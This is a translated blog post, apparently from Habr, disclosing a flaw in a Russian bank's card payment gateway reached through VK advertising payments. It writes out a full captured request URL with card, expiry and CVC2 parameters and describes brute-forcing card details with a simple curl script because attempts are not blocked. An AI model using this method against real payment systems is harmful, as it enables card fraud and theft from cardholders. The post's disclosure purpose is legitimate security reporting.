⬆️ ⬇️

Brute force card number, CVV2 and expiration date using the Master Bank website

A little more than a year ago, I already wrote about the vulnerability of the Master Bank and Vkontakte. After such a time, no one so closed the vulnerability, and kibizoidus ' comment seems so much more fun.



Well, and we continue. Today we will consider a much more serious vulnerability - the ability to sort out card details using the payment page of the same Master Bank.



As for the last time, for convenience, go to Vkontakt and choose payment for advertising with plastic cards:

')





Next, enter the details of the attacked bank card:







For example, run firebug in firefox or developer tools in chrome and intercept the POST request.

For convenience, we alter it into the following URL:

https://web3ds.masterbank.ru/cgi-bin/

cgi_link? CARD = 4 **************** & EXP = 06 & EXP_YEAR = 12 & CVC2 = 111 & CVC2_RC = 1 & NAME = - & AMOUNT = 100.00 & CURRENCY = RUB & ORDER = 2062445 & DESC = VK% 20RUB & MERCH_CHR

% EE% ED% F2% E0% EA% F2% E5 & TERMINAL = 71837464 & TRTYPE = 0 & COUNTRY = & MERCH_GMT = & TIMESTAMP =

20111116002415 & NONCE = & BACKREF = vk & P_SIGN = & FORM_ID = 0BB4A02A05B3580A & MERCH_URL =

http = // vkontakte.ru/payments.php?act=finished_ads&union_id=1600473347&result=unknown&source=masterbank

& expand_type = card & order_id = 2062445 & TIMESHOW = 08657 & PAGE = default-1251 & SEND_BUTTON.x = 43 & SEND_BUTTON.y = 7 & SEND_BUTTON =% CE% F2% EF% F0% E0% E2% E8% F2% FC



Now you can write a simple script using curl and brute force to select card numbers, cvv2 and expiration dates (parameters CARD, EXP / EXP_YEAR, CVC2, respectively) for a small amount. The Master Bank does not block the attempt. As the experiment shows, this link “lives” for several hours, and only then it expires.



PS According to tradition, Master Bank and WAY4 - the alleged vendor of this payment gateway were notified by e-mail, but none of them responded

Source: https://habr.com/ru/post/133415/



All Articles